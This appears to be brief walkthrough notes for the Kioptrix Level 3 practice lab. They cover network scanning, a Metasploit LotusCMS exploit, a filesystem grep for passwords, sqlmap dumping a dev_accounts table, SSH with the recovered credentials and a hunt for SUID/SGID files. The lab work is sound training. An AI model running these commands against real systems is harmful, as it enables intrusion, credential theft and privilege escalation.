# Kioptrix Level 3

## Enumerate the host and services

netdiscover -i eth1 -r 192.168.56.1/24
nmap -sP 192.168.56.1/24

nmap -p- -A <kioprix ip>

dirb http://<ip address>

## Based on results...

## MetaSploit against LotusCMS

msf5 exploit(multi/http/lcms_php_exec) > set RHOST 192.168.56.108
RHOST => 192.168.56.108
msf5 exploit(multi/http/lcms_php_exec) > exploit 

*** search for the word password

find / -maxdepth 5 -name * -type -f -exec grep -Hn password {} \; 2>/dev/null

http://crackstation.net


## SQL Injection

Create request file with burpsuite (file is called sqli1.txt below)

sqlmap -r sqli1.txt --risk=3 --level=5 -D gallery --tables --batch

Look for the table that is different than the rest...dev_accounts

sqlmap -r sqli1.txt --risk=3 --level=5 -D gallery -T dev_accounts --dump --batch


## SSH to host using creds (loneferret)

Snoop around in directories...

look for SUID/SUIG Files...

find / -perm /4000 -exec ls -l {} \; 2>/dev/null

find / -perm /2000 -exec ls -l {} \; 2>/dev/null


